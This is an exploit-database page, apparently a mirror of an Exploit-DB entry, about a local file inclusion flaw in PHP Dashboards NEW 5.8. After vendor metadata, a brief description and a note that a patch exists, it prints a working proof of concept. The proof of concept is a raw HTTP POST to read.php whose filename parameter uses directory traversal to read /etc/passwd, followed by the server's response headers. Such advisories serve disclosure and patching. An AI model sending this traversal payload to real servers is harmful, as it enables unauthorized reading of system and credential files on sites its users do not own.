header-logo
Suggest Exploit
vendor:
PHP Dashboards NEW 5.8
by:
Ihsan Sencan
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: PHP Dashboards NEW 5.8
Affected Version From: 5.8
Affected Version To: 5.8
Patch Exists: YES
Related CWE: N/A
CPE: 21540104
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2019

PHP Dashboards NEW 5.8 – Local File Inclusion

A Local File Inclusion (LFI) vulnerability exists in PHP Dashboards NEW 5.8, which allows an attacker to include a file from the local file system of the web server. An attacker can send a specially crafted HTTP request containing an arbitrary file name in the filename parameter to read.php, which will include the file in the output. This can be used to view sensitive files on the web server, such as the /etc/passwd file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/php/file/read.php
# 

POST /[PATH]/php/file/read.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=../../../../../../etc/passwd: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 20:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024

Navigation

Suggest Exploit

Services By CQR